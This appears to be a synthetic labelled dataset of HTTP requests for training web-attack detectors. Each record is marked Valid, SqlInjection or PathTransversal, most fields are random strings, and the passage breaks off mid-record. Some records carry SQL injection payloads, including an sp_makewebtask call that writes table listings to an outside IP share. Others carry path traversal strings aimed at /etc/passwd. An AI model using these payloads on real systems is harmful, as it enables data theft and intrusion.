End - Id: 18675
Start - Id: 33183
class: Valid
POST /dseogbnbAytge/t1hybzTAA4iiy/gDk/1PfelQVOI2WyC/4TDYexecTuE/iaHwlk@fvCy6S/rZnTaruTes-xce/mgnoactiknH3nq/lhdnhcf4lnni8u.html? HTTP/1.1
Content-Length: 21
Content-Language: y
Content-Encoding: gzip
Content-Location: http://www.hnatt0.biz/ors9/azee/eu9eoss.gif
Content-MD5: bXpzbnMyZWUzZEZ3Z0FpZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 30 Apr 08 07:06:53 UTC
Last-Modified: Sun, 07 Feb 10 19:44:36 CET
Host: www.eceu2e3.net
Connection: keep-alive
Accept: audio/basic, image/gif, video/mpeg
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 18.214.52.39
Cookie: edtneneyg14ru=ffgi;goNcuwetdstin1=?rmstmp 7tttnOt;hftisriujt=n|;nghahetows=750;5cdaaso0na=5806498
Cookie2: $Version="695"
Date: Wed, 13 Oct 04 16:04:42 CET
ETag: "VA6Cmm7Y3oyhrr3oP."
Expect: 100-continue
From: bowRwos@eCtnuhy9r.cz
If-Modified-Since: Fri, 24 Jul 09 04:35:17 CET
If-Unmodified-Since: Fri, 24 Feb 06 06:39:21 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 09 Aug 08 16:30:37 GMT
Max-Forwards: 1346
MIME-Version: 7.7
Pragma: 2ahu0=nL
Proxy-Authorization: Basic Z0Vkbm9laTpycXhtdA==
Authorization: Digest username="tetm"
Range: 8-21126,9-397638
Referer: /H1zTae.php
TE: gzip;q=0.3,gzip;q=0.1
Trailer: Accept-Encoding
User-Agent: gdtIid/0.8.2.2
UA-CPU: PowerPC
UA-Disp: 3344,7896,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 7712x8519
Via: FTP/8.2 23.182.225.208, 9.7 98.149.99.177, 2.2 www.woml.jpeg
Transfer-Encoding: compress
Upgrade: afteyP/8.9, csc/8.1, exortn/7.3, erha/8.6, aschS/4.3
Warning: 827 www.xnro.htm:61693 "jnuhnb0isss" "Sun, 06 Feb 05 14:14:12 CET"
X-Forwarded-For: 121.78.223.99
X-Serial-Number: 0421946796861302632
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

Cme8ensrsoDi=lie98LfS

End - Id: 33183
Start - Id: 31006
class: Valid
GET /Ycmd@FwG3BupdateF/etMeter3nthysf/loeseZe/vrcastfre8eavt.cfm? HTTP/1.0
Host: 120.125.145.248:41
Connection: eKil7tft
Accept: text/html
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: udpMzi-dr;q=0.9, voiiea-cnx;q=0.5, 58e-nt43;q=0.2, itqeec-tthmarri;q=0.5
Cache-Control: max-stale=9359
Client-ip: 154.71.85.33
Cookie: s7nberdvnaEb8s=5211
Cookie2: $Version="1"
Date: Sat, 27 Feb 10 16:10:56 UTC
ETag: W/"HsWbJfJMYMersmlI7a3w"
Expect: 100-continue
From: vle24@irebeh.gov
If-Modified-Since: Thu, 24 Feb 05 21:22:11 CET
If-Unmodified-Since: Thu, 15 Mar 07 01:29:22 CET
If-Match: "hZl3LFAXrkWwm0s59VC"
If-None-Match: *
If-Range: Sun, 14 Mar 04 20:05:00 CET
Max-Forwards: 77
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: eeu7 ueeiov3a=orpt7utl
Authorization: Digest response="A109a7421Bd27995B45cC5D8Bb179b17"
Range: 740-8502,247843-588
Referer: /rxoek.wmn
TE: gzip,deflate;q=0.4,gzip;q=0.9
Trailer: Cache-Control
User-Agent: igtgIitlhk5hNim4on
UA-CPU: MIPS
UA-Disp: 9729,1420,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 777x272
Via: FTP/8.0 65.152.239.50
Transfer-Encoding: identity
Upgrade: rsiehy/1.3, 29tde/2.6, oilqm/3.1
Warning: 983 www.mrtF.shtml "rologtjcostLkeiyxteo" "Sat, 01 Jan 05 14:24:41 GMT"
X-Forwarded-For: 73.18.235.121
X-Serial-Number: 65625
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 31006
Start - Id: 41549
class: SqlInjection
POST /4tthlc/agwtCa/c3aoobchLgirii1nEtoe/1ue5G@dfNgjScY.pl? HTTP/1.0
Content-Length: 164
Content-Language: Stn9
Content-Encoding: deflate
Content-Location: /Osfc5oor/rolr/nOte/rAtdpLij/nijh.asmx
Content-Type: application/x-www-form-urlencoded
Host: 239.250.177.20
Connection: NinTayn
Accept: */*;q=0.7
Accept-Charset: gb2312, windows-1252
Accept-Encoding: gzip;q=0.5, identity;q=0.8, gzip;q=0.8, gzip
Accept-Language: CdB-loea;q=0.1
Cache-Control: neleteTa=rcvpcae
Date: Wed, 20 Sep 06 13:42:20 GMT
If-Modified-Since: Fri, 04 Feb 05 20:43:35 GMT
If-None-Match: "Esxo52dS3tdeR4XDY"
If-Range: *
Authorization: eeatlT p6rlit=mRtse
Range: -493545,-583450,-71
Referer: /nhees/rcmhtry/On1eesPI/ic2klt.bin
Trailer: Cache-Control
User-Agent: Mozilla/3.2 (X11; U; Linux i386 8.0; lr-en; rv:9.2.2) Gecko/91479705
UA-Disp: 612,520,16
Upgrade: 9eb/1.1, ahdni0/1.3, aadtl/9.6
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

t8o=yuz9&auuCne=eEL &BFwleRimgN=72&gi=') UNION    ALL SELECT   smgore     FROM ac    WHERE    (''    =   '&sasXjwnatu=es?s'&eMjsnoxn=mAPiadac\th

End - Id: 41549
Start - Id: 19462
class: Valid
GET /1ueq/uheQiNW8BFA/3oetdnCokMaobm.htm?xmFiwaccess_log7=2e%3Fhd8&sNl0n9lcwncvtaz=297614&Y3eATe2kT=+selectNaw&nrm=7424370 HTTP/1.0
Host: 37.47.217.68
Connection: close
Accept: application/rtf;q=0.6, text/*;q=0.4
Accept-Charset: iso-8859-8-i, windows-1255, x-mac-hebrew, utf-8, windows-1258
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 101.98.75.185
Cookie: ft=1
Cookie2: $Version="049"
Date: Fri, 07 Mar 08 19:50:51 GMT
ETag: "2sxAmg2bScl7UvPP"
Expect: leieeu
From: onnnAm1I@spE2Fe0rns.com
If-Modified-Since: Thu, 10 Jul 08 11:24:23 GMT
If-Unmodified-Since: Thu, 03 May 07 02:22:43 CET
If-Match: *
If-None-Match: "d4vsJZX3F6hSZHga7xJ"
If-Range: *
Max-Forwards: 1
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest opaque="roeoyii"
Range: 201410-,-406227
Referer: http://www.ono8hlf.st/9oed/wNsAam/1ea9qje.php
TE: chunked
Trailer: Accept-Language
User-Agent: yDL6NJShG http://www.bonit5.it
UA-CPU: PowerPC
UA-Disp: 915,682,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 6480x436
Via: HTTP/2.2 145.128.187.41
Transfer-Encoding: identity
Upgrade: cICE/8.0
Warning: 833 139.253.101.46 "aPpebhw" "Sat, 11 Mar 06 14:51:53 UTC"
X-Forwarded-For: 229.29.101.243
X-Serial-Number: 219251362727568
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 19462
Start - Id: 41099
class: SqlInjection
GET /pkEr9jWRWWBu0aOHk/bw4kgsmae/J0fRjwxtermA/apJR/n2e/CBhY5Qzform/r@P1KdPhnd4LN/eo/nosdaceoslnsnn7p/rpcnCJOpu_Vy/4twnlxOiirlttgyoi.nsf?AnodeOm=35776644&oIstTch5j7=o+d&Hhyqrnhelu=%27%3B++++EXEC+++master..sp_makewebtask++%22%5C%5C70.5.177.76%5Ct9ao5At%5Cht.jpeg%22%2C+%22SELECT+++*+++FROM+++INFORMATION_SCHEMA.TABLES%22&n3ritkeoc2hAN=%26apassthruklh%24-&iBgtjx=d3ahySmelaaen&9pimVrAItie=%3Fchssamcsid&eau43exo=332724&uaesnnrlgs6scq=3644273&gdotrnhl=986918&toa=wjNxs&ambncHAaiigrcoo=dbee HTTP/1.1
Host: www.thantDsh.gov:80
Connection: vhoh
Accept: video/quicktime;q=0.5
Accept-Charset: *
Accept-Encoding: deflate;q=0.4, deflate, deflate;q=0.0, deflate, gzip
Accept-Language: *
Cache-Control: min-fresh=4
Client-ip: 26.15.87.96
Cookie: seepe4Ejene=snGdswds\window.openrsterfn:;H8tCeAPer=cepassthruq oxtermml)cd: r$forms;uTiOpuaarta=u;sg35sO=0tdxt;1mail0vSlibservicesuEMYchild=ksfbn
Cookie2: $Version="397"
Date: Thu, 19 Mar 09 09:07:14 CET
ETag: "08c.BwX7mSH8DfY"
Expect: 100-continue
From: ixits@nymeatnrae.gov
If-Modified-Since: Fri, 02 Apr 04 16:35:36 UTC
If-Unmodified-Since: Wed, 20 Jan 10 15:20:26 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 7.6
Pragma: ttd=meyga
Proxy-Authorization: Digest opaque="sqsll"
Authorization: eotpD tuweeo=plts5pr
Range: 1-877
Referer: http://www.hODgpExc.biz/aq4ld.conf
TE: trailers,chunked;q=0.0,trailers
Trailer: User-Agent
User-Agent: ntaeinaoiL (ih49dNk; bgLyYR70; 5SCR-l9U; oJxbg5q.g; fsD-RvJ-)
UA-CPU: PowerPC
UA-Disp: 926,7799,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 194x0684
Via: FTP/1.7 www.aepqY.css:07
Transfer-Encoding: proa2
Upgrade: trcoos/7.4, ocdNs/3.5
Warning: 451 198.72.245.237:3639 "gyrmlem" 
X-Forwarded-For: 84.186.228.20
X-Serial-Number: 54708069609443708
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41099
Start - Id: 2244
class: Valid
GET /qxyhsadhbea/eXqJrPC30NYbid8Bch/Yt0I_/aCKq/8RC1TmARB/ec804lB/tSjNSiCwTqpt/iidi/iaLaayga5iiOeepo/dIresutiNatoc4ez2uhS/kaedctqbnehO2neiOnhw.nsf?adyFyLg5erohr=DpbsmSes&omn0rsh=%29wrief6iw0sEni%2B&ttt=eqRgBg&CA8JqgO=ur3korlibEisexecMsp&d9SDBVT8=L%3E&lepr=9798&ynOoTrnh1emaco=tm+Ontd&uojrnoofelh0zy=j5tySxP&wRwso0dxS=2&eertpeaiGm=1.B&2FWkSkW6a=08&J7FX=%26zuttcorenees&8ierfhA5Tn4zf3=u%5Dn-atreclhiexwp HTTP/1.1
Host: www.Cicsmamc.fr
Connection: keep-alive
Accept: audio/*
Accept-Charset: *
Accept-Encoding: deflate, identity, deflate;q=0.9
Accept-Language: *
Cache-Control: e6e='uliz'
Client-ip: 124.21.115.181
Cookie: pAdutoaJ=is8m6--;lpniIeernt=idenync;yneasdR=4;3shstz9ahne=iBqu0Hw;aciotm21ri4adt=meh;FcatdivtV@0vg0X=tlElstge
Cookie2: $Version="557"
Date: Sun, 23 Apr 06 08:30:43 CET
ETag: W/"tjqftY-jdCxUK1bXKpw"
Expect: 100-continue
From: oniNcb@l92ecsed.it
If-Modified-Since: Wed, 24 Mar 04 10:56:46 CET
If-Unmodified-Since: Tue, 17 Feb 04 09:32:40 CET
If-Match: "YtXJbXxlBvFW7DzIj"
If-None-Match: "jWE6TLZzyXJ7mRB"
If-Range: *
Max-Forwards: 550
MIME-Version: 7.3
Pragma: naeneSrr=v4iontm
Proxy-Authorization: Basic c2dlaGpvOm9jbXh0d2Vy
Authorization: Basic MTBkb2lnOnJsRVVOdQ==
Range: 98793-,-49003,-71607
Referer: /jl2z6/odeoemq7/5Aahm/e7ha9o/dwlqsp.css
TE: trailers,trailers,gzip;q=0.0
Trailer: Host
User-Agent: olK@kkc http://www.Toc1lL.fr
UA-CPU: StrongARM
UA-Disp: 006,895,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 3153x522
Via: hAr/2.6 139.85.179.1
Transfer-Encoding: deflate
Upgrade: uadh/3.9, esa/6.4
Warning: 141 102.221.143.25:60740 "vgrreunklthugbStknar" 
X-Forwarded-For: 211.5.1.135
X-Serial-Number: 92243859196
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2244
Start - Id: 18027
class: Valid
GET /odTyd6bqA/nti0gtc/hthp/eRC/agtoietmOe/allcrG/lmiaIp/eEa/tqRgZLX.html?SbwLIfiL=4Aaea7Ufaa&64uD1rnlethst=456735087&odh4=ti&sutl=hAtwiy&e2enooe3=44256965&6g=783692&pn3egL8=aivens2T&eotaeuabs=wherermwlqeDcTnr&s@M_a=ed2IFhco6Lz&allVlike2tObi_ISq=2X.&3iaillt=+&Zwhere1shutdownEw=lsi&ZJunionEL4lunionm=an%7C6%27%3C6%29nc%3Bufc%3ERs1&f4ueexonbtzs1No=yg.tr-dWM HTTP/1.0
Host: 19.136.195.181:80
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: compress, compress, identity, gzip
Accept-Language: v3Amee-wmbh, rap-Koopvbc;q=0.3
Cache-Control: max-stale=467
Client-ip: 145.226.55.110
Cookie: eosl=tytild7meeT;eh=aoqbetweenRshpfYectr
Cookie2: $Version="696"
Date: Sun, 04 Oct 09 02:12:31 UTC
ETag: "p-D8UCEZpN4@poKd"
Expect: 100-continue
From: ats2Yl@qfecrc.org
If-Modified-Since: Sat, 02 Sep 06 08:17:04 UTC
If-Unmodified-Since: Wed, 12 May 04 21:50:02 CET
If-Match: "w5Hd1ADPDfpy-8o"
If-None-Match: *
If-Range: Mon, 26 Jan 09 09:47:10 GMT
Max-Forwards: 96
MIME-Version: 4.7
Pragma: tsnaed=7iNi
Proxy-Authorization: Basic NnNlZ2R0OmlleXRn
Authorization: Cecoi czhe=ndeeH2s9
Range: 223-,754-
Referer: http://tIelorH.net/eelgysed/owisiu8/oannse1n.doc
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: N6ikcuRoei (x-5AEi; iZDlUEeh1; 1DI8YKelyz; nF5JsMGct; eZczr.RIqD)
UA-CPU: PowerPC
UA-Disp: 8850,7638,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 9181x5761
Via: FTP/2.6 157.183.170.22:5
Transfer-Encoding: compress
Upgrade: xss/8.4, staait/9.4
Warning: 588 163.8.214.21 "m46Ire" 
X-Forwarded-For: 104.233.139.60
X-Serial-Number: 400304165957564859
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18027
Start - Id: 46131
class: PathTransversal
GET /wtan/hWOod/oy6y0kKjhJP-l.yLI-0/teeLyT/ht0zenrsN7j/jO.awa3aOghFAC/nprrnI/8gB/fqe4u/h68htn/unionDncO.n@HTXXaJo.aspx?urrbwos=esddctniwvtKeaae&-bGVmochaScg=owslzg%3Bhzt&PLEhveeddh56rs7=173&F@Qfim=aeinrotociynsn4&RcNREAI=eKKmolWvpGP-&oau=5990&yp=fjp%280i&tpnuufmnsgusk=ovriTtrth&tId2SEhfNId=tlannsiIe&tpi1nm3o=n9i&HgexecEqYDdq=qh&kaeInqioRew=e8Cr&zmd4netmoyolaat=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&un83lacsbli=705719&geendcsros=wlKra HTTP/1.1
Host: www.atiss.de
Connection: keep-alive
Accept: video/quicktime;q=0.9, image/*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 17.48.51.41
Cookie: bjwteesotaesmQ=eh8oeidw;u2shxnapoa4aeo=%)vsa2lsPi8w;hsahee6jmnE=6838;drEaulr7sntrN=l5s(o
Cookie2: $Version="272"
Date: Mon, 28 Apr 08 13:20:30 UTC
ETag: W/"vMDloPJ7nBvdxA8cggU"
Expect: 100-continue
From: r9hecgen@ob8h.it
If-Modified-Since: Tue, 26 Jul 05 13:48:37 UTC
If-Unmodified-Since: Mon, 29 May 06 18:17:02 CET
If-Match: "-huZnnzoh_ZCehf-Qbg"
If-Range: *
Max-Forwards: 371
Pragma: byd=bdsaos
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: cOnr 0keiminm=fEu1eshg
Referer: http://www.oNsut.org/oOofibnz.cfm
TE: deflate;q=0.9,gzip;q=0.3
User-Agent: lhsdimlbwwux9wetd
Via: 3.2 www.risslcp.js, 8.1 216.219.61.83
Transfer-Encoding: compress
Upgrade: 4sr0z/5.8, 5eIsba/5.8, lviujp/4.0, arJ2h/2.1, fgge/2.5
X-Serial-Number: 83931
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46131
Start - Id: 11901
class: Valid
GET /1ebeahKe0eailiMcebw/uGm/C1iteLda/pmsa0rdnn/aetoostnboiotPe/tsseas/tyrdIAneo7hRgohtr3as/3MX@P1O/oXI9h8.asp?pcornIo=845894846&dn-6Xf=emudrsid&heea=4froe HTTP/1.0
Host: www.nwlbh9.com
Connection: close
Accept: */*
Accept-Charset: x-mac-arabic, iso-8859-7;q=0.1, windows-1254, euc-cn;q=0.7, iso-8859-8-i
Accept-Encoding: deflate, deflate;q=0.5, compress, deflate
Accept-Language: dn-oEIeH
Cache-Control: no-store
Client-ip: 128.86.71.115
Cookie: stUntpg8nie=r ;in7eieeNmiDzf= ;tstsooqrs2=faiep
Cookie2: $Version="556"
Date: Mon, 06 Nov 06 24:09:25 CET
ETag: W/"Xeo@EaWGnDsJT@6"
Expect: meccetko=pati
From: cwtdea@hotshneub.biz
If-Modified-Since: Sun, 18 Apr 10 22:16:35 CET
If-Unmodified-Since: Thu, 07 May 09 21:21:26 CET
If-Match: "eOyyLJHkyhB4hfSis3b"
If-None-Match: *
If-Range: Mon, 13 Jun 05 14:41:10 UTC
Max-Forwards: 4
MIME-Version: 7.3
Pragma: 4eaL='soiKNs'
Proxy-Authorization: sero tcgs=n3rcmn
Authorization: emel oohcn=ey9uap
Range: 477-56
Referer: http://7txr.st/l1uauNxl.asp
TE: chunked;q=0.7,gzip
Trailer: If-None-Match
User-Agent: Fxm99rzbghanif4ts
UA-CPU: x86
UA-Disp: 529,350,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 2025x4273
Via: 6ndlex/7.9 183.179.113.71, 2.8 www.pgcrV.jpg, 8.1 www.d2a4.gif
Transfer-Encoding: trSl; 4tgt=4nyay
Upgrade: iena/2.8, eot/6.3, eoe/2.9, dteT/9.3, QCLo6/1.2
Warning: 336 www.N0ys.htm:4 "eHsiwTfaeeetyrdoo" 
X-Forwarded-For: 230.225.78.26
X-Serial-Number: 071844089
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11901
Start - Id: 22527
class: Valid
GET /dsnyo/63qeaenuh1tdhteoe/frt2elitds.msf?talr=winnt%24&hr=aphOs&jrd3=silheo1pr&sglehhsaEd=n0E&flDt2a=2895&homestdincLc=tdcsi1m&dkn9=e6rds&cbhdeltrt=rehto%3Fsc&77pIm=nwsaf-bn%25hn0ithoan HTTP/1.1
Host: 202.62.177.171:80
Connection: 0weraa
Accept: video/mpeg, video/mpeg;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=18316
Client-ip: 231.77.197.139
Cookie: gon3wa2=t
Cookie2: $Version="3"
Date: Sat, 27 Jan 07 23:23:33 CET
ETag: W/"nxRHKEK.BQeNWF48@A5-"
Expect: 100-continue
From: tPaqdxr5@TPBaoi4r.org
If-Modified-Since: Sun, 12 Sep 04 19:31:18 UTC
If-Unmodified-Since: Sun, 07 Jan 07 07:48:35 CET
If-Match: "oOLAdfA1do_ZSNAr@"
If-None-Match: "T8W6rYM0q65mtV0JG"
If-Range: *
Max-Forwards: 9
MIME-Version: 6.6
Pragma: n1=llmAB
Proxy-Authorization: Basic cnJpMGFlbjptaDlpcw==
Authorization: NTLM MmV6b1RzY1BhZW5pdXU5ZWVpZW5odXVlNmVudGRsbzFmbW94amFyc3RldW4=
Range: 97-403959,415744-,056-023107
Referer: http://www.webniwe.biz/a4doe/brEhtois/strnDtfg.gz
TE: deflate,trailers
Trailer: Connection
User-Agent: Mozilla/8.7 (compatible; merly; Open BSD i586; heBo; tden)
UA-CPU: Sparc
UA-Disp: 017,7733,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 568x5684
Via: HTTP/3.9 200.124.217.147, 2.8 10.145.140.74, 3.0 www.ishh.shtml
Transfer-Encoding: ffahwy; h6LTer=lBvEu6t
Upgrade: yul/1.8, gvic/9.5, hGaw/6.7, Hpe/9.6, dae/2.3
Warning: 050 42.224.216.74 "terFienh" "Wed, 12 Mar 08 09:39:17 GMT"
X-Forwarded-For: 227.174.126.186
X-Serial-Number: 0491740909145878411
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 22527
Start - Id: 25599
class: Valid
GET /ct.aspx?2re=r5%40H&3hayius=be&oahecna=oiyaI5ihediveid&ls5Ypk=8714706&1EncliHb5trOt=l-%40lluBBm%40&oems4nTo3i=857&jottd5aoamwiu=iie&aei9wgemYet4=nrTta&es=%25e HTTP/1.1
Host: 218.127.172.23
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-arabic;q=0.8, euc-kr;q=0.0
Accept-Encoding: *
Accept-Language: dre-rdz06a;q=0.3
Cache-Control: no-transform
Client-ip: 254.210.233.20
Cookie: ctwrj=Etdhe 0e(ywp-Itmpon35;Qlog-Hf=drml-ovv7 f5hbn:i;ytIUwolms5m=48037
Cookie2: $Version="532"
Date: Tue, 29 Dec 09 01:38:58 UTC
ETag: W/"-vFLLiCYGnZ.bQ_2Uxwx"
Expect: 8hyoni4e=ehnweh
From: camaabz@oEUygi.cz
If-Modified-Since: Fri, 03 Aug 07 15:39:31 GMT
If-Unmodified-Since: Wed, 20 Aug 08 06:40:12 GMT
If-Match: *
If-None-Match: *
If-Range: "m1gN@tY99yw.uwtM"
Max-Forwards: 364
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: NTLM bmplYW5kMmVvaHNvb3NlZjdxdDRlZWl3Y3VkYWpha2ZiaHRzaWVUaWV5
Authorization: Digest opaque="ZlAN"
Range: 286-,8185-
Referer: /ts1Iqtta/DhIaSamd/aeap/dmaetnoa/aitv.cgi
TE: gzip;q=0.3,deflate;q=0.1
Trailer: Warning
User-Agent: Mozilla/5.7 (Windows; U; Win 9x 1.6; Aj-nL; rv:2.7.9) Gecko/33713545
UA-CPU: PowerPC
UA-Disp: 8439,526,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 290x491
Via: HTTP/5.9 108.77.72.179
Transfer-Encoding: identity
Upgrade: 1ri/9.8, wbhp/8.4
Warning: 650 136.91.203.255 "ymolni9b19rts" 
X-Forwarded-For: 255.93.182.143
X-Serial-Number: 10779920705093
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25599
Start - Id: 24608
class: Valid
GET /i1@hZOwttPzbPU.shtml?rjineCir=2Jdh%7EoDdnnbrc&5fur=rxsernceae&mailH-Ae=0dirHEd&dltdtsdieNhRial=08284470&xU1LL=6558739&HA1=0802310&Zidauarlaptenls=%3DaDn%3Atypbn&pHynulluDE=917 HTTP/1.1
Host: 215.73.220.148
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.2
Accept-Language: c1qe-tdocl, sld0meL-d451Qea, stf7Ufo-thhe;q=0.5, ono8rmiu-h9iin1o;q=0.9
Cache-Control: 3tqbTepi='fsceUzsn'
Client-ip: 144.153.248.99
Cookie: 2i8zwget@u_=32469374;meR2untedtssc=7841
Cookie2: $Version="9"
Date: Sun, 23 Sep 07 11:05:41 CET
ETag: W/"pNl764YjtFInVklT"
Expect: 100-continue
From: EXbha@seimaro.st
If-Modified-Since: Sun, 11 Feb 07 04:02:12 CET
If-Unmodified-Since: Thu, 17 Nov 05 24:21:24 CET
If-Match: "_@2BBR5Ou9HC2soT"
If-None-Match: "MN6Z1kcVdo4O2KoRV3Vz"
If-Range: "P_nF9560HB4UyGwzmHCd"
Max-Forwards: 7697
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: R9lOil aedc=l6achff
Authorization: Aenm dlou=deTnpsad
Range: -633614,846-,145-
Referer: /en20wx/anasr/me0w.php
TE: trailers
Trailer: Host
User-Agent: Mozilla/0.4 (Windows; U; Win 9x 9.4; ao-th; rv:7.4.5) Gecko/14687635
UA-CPU: StrongARM
UA-Disp: 678,816,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 4948x889
Via: 3.6 www.stxnne.png, reei/2.2 98.221.251.64, 8.5 www.ndjl.js
Transfer-Encoding: compress
Upgrade: lha/0.0, onynn/5.1, e0f2s5/9.2, leAc/8.0
Warning: 725 www.hdse.js "umrhh5ybso" 
X-Forwarded-For: 181.137.254.3
X-Serial-Number: 04810456
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24608
Start - Id: 20392
class: Valid
GET /ulodcsver/pteeg3noeHsRDsltfi/72NSiageSRpltlvlhNa/wtM8sjqZ7-/sE3t2EoqSHQz2S/dJ/oO41gXXar_ca1p.asmx? HTTP/1.0
Host: www.ty5tAr.gov
Connection: keep-alive
Accept: video/quicktime;q=0.6
Accept-Charset: *
Accept-Encoding: identity;q=0.8, identity, deflate;q=0.3
Accept-Language: *
Cache-Control: max-age=3
Client-ip: 115.20.170.209
Cookie: me=aot+Tqau=httpsn
Cookie2: $Version="0"
Date: Sat, 18 Mar 06 11:38:22 UTC
ETag: W/"KSSTKH7SBe30gRd"
Expect: eS2n2h1
From: 0kae9sa@oq7ndrr.de
If-Modified-Since: Sat, 19 Dec 09 24:43:44 UTC
If-Unmodified-Since: Sat, 01 Apr 06 16:31:51 CET
If-Match: *
If-None-Match: "Jj6JRK8SOQ8_fwHOXMn"
If-Range: Sat, 09 Aug 08 08:29:03 CET
Max-Forwards: 9
MIME-Version: 8.6
Pragma: b='enepwn'
Proxy-Authorization: NTLM ZW5zdGxldGxBeG5lOWV5aWVvaWhiY29lYnJtaXhuZWVldw==
Authorization: Basic ZWVldFdhbmM6dGRyb3V0V3E=
Range: 76141-2977,-2,838977-2
Referer: http://www.lsaAb.cz/4enEch/t6keLI.wav
TE: trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/0.3 (Windows; U; Windows NT 8.9; ok-ea; rv:2.4.4) Gecko/02729582
UA-CPU: 68000
UA-Disp: 8020,2426,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 225x040
Via: 2.3 www.elte.html:07
Transfer-Encoding: 9iPimt; xnu4f=inza
Upgrade: wbsoPk/6.5, ona/5.9, rnyanm/2.0, ej1ben/3.4
Warning: 668 77.12.111.43 "n6wsowsinh7xC" 
X-Forwarded-For: 167.64.131.250
X-Serial-Number: 13904679569976
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20392
Start - Id: 45708
class: PathTransversal
GET /sCexec/LeH2@mf/peN/htdIF9XEY/e2/q5G/iekdie7ttdeeq/.5gxvdcHQhttpf/C6r-5xT9/tesa8esst6mrily/4mtedzft7.aspx?FzCPchildF=Lasfroma&crfttnaobwshEww=leojnq1set&2jan9Aunehe=i%3A%5Cautoexec.bat&tse=+tgroup+by HTTP/1.0
Host: www.sdoieoc.it
Connection: tuetm
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 40.163.244.11
Cookie: 9d=u6GUD705
Cookie2: $Version="894"
Date: Sat, 01 Dec 07 03:35:08 GMT
ETag: "W2cyccIkLZi2-vmxGbfE"
Expect: 100-continue
From: eajtut@smge.gov
If-Modified-Since: Sun, 23 Apr 06 15:47:38 CET
If-Unmodified-Since: Thu, 07 Jan 10 09:43:21 UTC
If-Match: "eRyBH9-6dexol21oD"
If-None-Match: "uCmYFFYx004KMs_I-TE"
If-Range: Sat, 19 May 07 22:51:51 UTC
Max-Forwards: 4
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic b3VyZ2NvZTppaHNy
Range: 8441-
Referer: /heptcFR/eiqel/wRirs/eaaMmV4i/aoukdvn.mpg
TE: trailers,chunked;q=0.3,trailers
Trailer: Cache-Control
User-Agent: oa8an5olseyceanauEO9
UA-CPU: Sparc
UA-Disp: 8763,047,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 967x7308
Via: HTTP/8.6 www.rr8w.css, 0.1 186.99.51.155
Transfer-Encoding: gzip
Upgrade: sz3/7.1, 6Dnd/4.3
Warning: 288 223.210.181.104 "nzlia9itn3swklmex" "Fri, 29 Apr 05 08:27:02 GMT"
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45708
Start - Id: 2568
class: Valid
GET /rvt3precsfotedY1/a3hHeQkM_a4lf.ijAw/fhaFepbhbeseSoij/qnMzP-lhK/9EpKTrGh.mspx?tpqw=a2t&83=Mre&rfShjQcatV3h=S7neefmogatic&ehsogtuehi=4947920 HTTP/1.1
Host: www.yon6nsek.de
Connection: close
Accept: */*
